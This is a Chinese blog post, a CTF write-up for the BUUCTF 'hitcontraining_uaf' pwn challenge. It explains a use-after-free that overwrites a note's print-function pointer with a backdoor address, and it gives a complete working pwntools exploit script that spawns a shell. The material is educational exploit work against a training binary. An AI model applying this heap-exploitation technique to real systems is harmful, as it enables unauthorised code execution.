hitcontraining_uaf

最新推荐文章于 2024-01-12 17:55:55 发布
最新推荐文章于 2024-01-12 17:55:55 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: buuctf 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/121856454
版权

hitcontraining_uaf

查看保护
请添加图片描述
有uaf,还有后门函数
请添加图片描述
这里会将show的功能存放在堆里,没有pie所以思路就是将print_note_content这个功能改成magic就可以了,改完show一下就可以执行magic。
申请两个0x10堆, 释放掉,有uaf,没有清0。
请添加图片描述
这时再申请一个0x8的堆,因为fastbin,填充content时其实就改的是print_note_content。
请添加图片描述
content放入magic即可。

from pwn import *

context(arch='i386', os='linux', log_level='debug')

file_name = './z1r0'

debug = 0
if debug:
    r = remote('node4.buuoj.cn', 29518)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = 'Your choice :'

def add(size, content):
    r.sendlineafter(menu, '1')
    r.sendlineafter('Note size :', str(size))
    r.sendlineafter('Content :', content)

def delete(index):
    r.sendlineafter(menu, '2')
    r.sendlineafter('Index :', str(index))

def show(index):
    r.sendlineafter(menu, '3')
    r.sendlineafter('Index :', str(index))

magic = 0x8048945

add(0x10, 'aaaa')
add(0x10, 'bbbb')
add(0x10, 'cccc')

delete(0)
delete(1)

#dbg()

add(8, p32(magic))

#dbg()

show(0)

r.interactive()
z1r0.
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
UAF原理及相关一道CTF
qq_36963214的博客
07-27 2645
前言 通过学习UAF原理及其在CTF中的应用,通过理论是实践相结合,可以更好地掌握UAF漏洞。 UAF漏洞原理 #include<stdio.h> #include<stdlib.h> int main() { char *p1, *p2; p1 = p2 = NULL; p1 = (char *)malloc(10); if (p1 == NULL) { printf("fail to malloc p1"); exit(1); } memcpy(p1, "
2021_UAF_SE_Nhom06
03-20
【标题】"2021_UAF_SE_Nhom06" 指的可能是一个软件工程项目的代码库,其中“UAF”可能是大学或机构的缩写,“SE”代表“Software Engineering”(软件工程),而“Nhom06”可能是项目组的编号或者课程的学期编号。...
【转】深入了解 Windows 7 用户帐户控制
weixin_33849215的博客
08-06 191
用户帐户控制 Mark Russinovich 概览: 标准用户帐户 用户帐户控制 在家庭和公司环境中,使用标准用户帐户可以提高安全性并降低总体拥有成本。当用户使用标准用户权限(而不是管理权限)运行时,系统的安全配置(包括防病毒和防火墙配置)将得到保护。这样,用户将能拥有一个安全的区域,可以保护他们的帐户及系统的其余部分。对于企业部署,桌面 IT 经...
[BUUCTF]PWN——hitcontraining_uaf
mcmuyanga的博客
09-07 1632
[BUUCTF]——hitcontraining_uaf 附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,非常常见的创建堆块的菜单 32位ida载入分析,shift+f12查看程序里的字符串,发现了/bin/sh,ctrl+x,跟进找到了后面函数,shell_addr=0x8048945 堆的main函数很简单,逻辑很简单,也没什么好说的,直接看菜单的各个选项 add ...
uaf42.zip_uaf42_uaf42 design_uaf42-data
09-23
标题中的“uaf42.zip_uaf42_uaf42 design_uaf42-data”表明这是一份关于“uaf42”设计的压缩文件,重点在于“uaf42”的设计及其相关数据。描述中提到的是使用“uaf42”设计的有源滤波器,并记录了高通滤波器的设计...
fido_uaf_certification_adapter:金雅拓FIDO UAF认证服务器的认证适配器
05-15
FIDO UAF服务器的URL由环境变量UAF_SERVER设置已知问题/局限性不支持TLS 没有自动化测试非最终产品(仅用于通过FIDO认证测试套件)-不进行代码审查-不进行渗透测试运行测试建于贡献请阅读以获取有关我们的行为准则...
fido-uaf-v1.0-rd-20141008.zip_FIDO UAF1.0Client_U2F_fido uaf1.0
09-19
FIDO U2F协议依赖于一个加强的加密第二...最终用户携带一个简单的U2F设备可以用于任何支持该协议的应用上。用户得到一个通过一个简单的KEY设备得到一个安全的环境。这个文档是对U2F协议和一个阅读详细文当前的概述。
FIDO-UAF协议
12-30
FIDO-UAF协议官方文档,FIDO协议是目前国际范围内最火的统一认证协议
buuctf hitcontraining_uaf
cainiao78777的博客
04-12 233
会把指针堆块1重新分配给我们,context堆块会把指针堆块0分配给我们(因为我们申请一个堆块实际上是申请两个堆块(一个指针堆块,一个context堆块))程序是先申请一个指针堆块,这个指针堆块的大小为8字节,前四字节存储的是puts函数的指针,后四字节存储的是要申请的堆块内容指针就是相当于这样。3.打印堆块内容,这段代码会把指针堆块的第一个指针来执行函数,如果把第一个指针修改为后门函数指针,就能getshell。2.释放堆块,这个操作,在释放堆块之后,并未把指针置零,所以存在uaf漏洞。
BUUCTF-pwn-hitcontraining_uaf(UAF)
半岛铁盒的博客
06-05 308
这道题可以用来当做堆的入门题来做 开了NX 这是堆的菜单;
hitcontraining_playfmt
qq_62887641的博客
09-14 85
32位保护全关存在格式化字符串漏洞,并且是bss段,也就是非栈上的格式化字符串。
pwnhitcontraining_uaf --堆利用之uaf
最新发布
question55的博客
01-12 424
a。
前端浏览器 UA 客户端信息识别模块 -- uadetector
stay hungry ! stay foolish!
04-20 954
前端浏览器 UA 客户端信息识别模块 -- uadetector maven依赖如下: <dependency> <groupId>net.sf.uadetector</groupId> <artifactId>uadetector-resources</artifact...
UAF学习--原理及利用
weixin_30555515的博客
10-28 370
0x00 UAF原理 如上代码所示,指针p1申请内存,打印其地址,值 然后释放p1 指针p2申请同样大小的内存,打印p2的地址,p1指针指向的值 Gcc编译,运行结果如下: p1与p2地址相同,p1指针释放后,p2申请相同的大小的内存,操作系统会将之前给p1的地址分配给p2,修改p2的值,p1也被修改了。 由此我们可以知道: 1.在free一块内存后,接着申请大小相同的一...
uaf pwn hacknote
09-26
根据提供的引用内容,hacknote程序存在Use After Free(UAF)漏洞。UAF是一种内存安全漏洞,它发生在程序试图使用已经被释放的内存区域时。在hacknote程序中,delete_note函数中释放了note对象的内存,但没有将对应...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值